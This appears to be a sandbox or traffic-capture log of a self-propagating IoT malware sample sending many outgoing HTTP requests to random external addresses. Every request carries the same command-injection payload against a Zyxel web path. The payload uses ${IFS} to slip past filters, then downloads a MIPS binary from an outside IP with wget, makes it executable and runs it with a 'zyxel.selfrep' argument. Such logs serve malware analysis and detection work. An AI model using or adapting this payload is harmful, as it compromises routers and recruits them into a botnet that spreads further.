                                      Jan 14, 2024 15:51:00.638231039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8029192.168.2.1449784146.41.207.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638286114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8030192.168.2.1440196116.191.228.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638309956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8031192.168.2.144957496.49.219.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638354063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8032192.168.2.146011680.54.113.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638382912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8033192.168.2.144151691.136.144.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638427019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8034192.168.2.1460138150.210.175.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638473034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8035192.168.2.14483605.90.117.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638514996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8036192.168.2.1450250112.148.76.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638565063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8037192.168.2.1452398152.52.129.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638612986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8038192.168.2.144153495.170.250.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638645887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8039192.168.2.144870659.96.13.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638680935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8040192.168.2.1445528223.127.100.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638727903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8041192.168.2.144840693.63.152.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638753891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8042192.168.2.1445942112.185.63.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638791084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8043192.168.2.143607032.64.172.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638834000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8044192.168.2.1433554221.163.135.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638859987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8045192.168.2.144402276.14.244.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638910055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8046192.168.2.1456102213.64.63.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638957024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8047192.168.2.1458470218.105.137.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.638976097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8048192.168.2.1436304103.255.127.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639039993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8049192.168.2.143288876.189.104.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639066935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8050192.168.2.146043459.120.224.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639121056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8051192.168.2.143526685.204.22.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639146090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8052192.168.2.1440596186.194.57.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639183998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8053192.168.2.144999465.119.187.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639229059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8054192.168.2.144976689.133.139.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639261961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8055192.168.2.1432790116.151.224.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639308929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8056192.168.2.1445464201.201.19.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639343977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8057192.168.2.1452202209.38.162.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639377117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8058192.168.2.1442258178.26.119.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639431953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8059192.168.2.14558728.78.7.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639466047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8060192.168.2.1455912147.137.25.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639508963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8061192.168.2.1444910207.5.182.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639547110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8062192.168.2.143688457.209.51.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639579058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8063192.168.2.14352021.207.188.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639610052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8064192.168.2.1447776207.13.143.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639647961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8065192.168.2.1453930136.180.161.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639683962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8066192.168.2.145283034.44.203.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639709949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8067192.168.2.1432956191.197.127.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639763117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8068192.168.2.1442312109.215.104.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639795065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8069192.168.2.144922293.149.101.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639853954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8070192.168.2.1442012142.253.110.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639890909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8071192.168.2.144751694.21.198.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639934063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8072192.168.2.1434878219.207.143.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.639964104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8073192.168.2.143356227.146.178.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640021086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8074192.168.2.144665680.37.95.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640058994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8075192.168.2.1452138161.70.12.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640110970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8076192.168.2.1435804114.207.242.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640151024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8077192.168.2.144615473.184.160.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640197039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8078192.168.2.144344087.180.0.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640227079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8079192.168.2.1436550207.73.1.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640258074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8080192.168.2.1448070124.179.65.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640301943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8081192.168.2.1458772178.38.209.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640321970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8082192.168.2.1439238142.19.236.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640387058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8083192.168.2.1454586212.112.209.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640424013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8084192.168.2.145441060.234.133.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640481949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8085192.168.2.144105031.122.87.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640528917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8086192.168.2.145909641.238.53.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640553951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8087192.168.2.1447776139.119.225.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640613079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8088192.168.2.1435704113.119.190.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640636921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8089192.168.2.14358829.94.7.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640687943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8090192.168.2.1447488201.59.1.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.640714884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8091192.168.2.1446138163.191.157.189443
                                      TimestampBytes transferredDirectionData
